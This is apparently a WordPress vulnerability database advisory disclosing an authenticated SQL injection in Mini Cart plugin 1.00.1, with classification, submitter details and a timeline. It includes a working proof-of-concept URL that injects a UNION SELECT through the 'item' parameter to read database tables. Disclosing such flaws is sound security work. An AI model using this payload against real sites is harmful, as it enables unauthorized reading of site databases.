Mini Cart Plugin 1.00.1 - Authenticated SQL Injection



Description
$_REQUEST[item] is not escaped. Url is accessible for user collaborator above.

Url vulnerable : http://target/wp-admin/edit.php?page=mini-cart/item_form.php&item=0&action=edit
Proof of Concept
http://target/wp-admin/edit.php?page=mini-cart%2Fitem_form.php&item=0+UNION+SELECT+1,2,3,4,5,name,7,8,9,10+from+wp_terms+where+term_id=1&action=edit

Affects Plugin

References

URL http://lenonleite.com.br/en/blog/2016/11/11/mini-cart-plugin-1-00-1-for-wordpress/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Lenon Leite
Submitter Website http://lenonleite.com.br/
Submitter Twitter lenonleite
Views 5448
Verified No
WPVDB ID 8671

Timeline

Publicly Published 2016-11-11 (about 3 years ago)
Added 2016-11-21 (about 3 years ago)
Last Updated 2019-11-01 (about 1 month ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin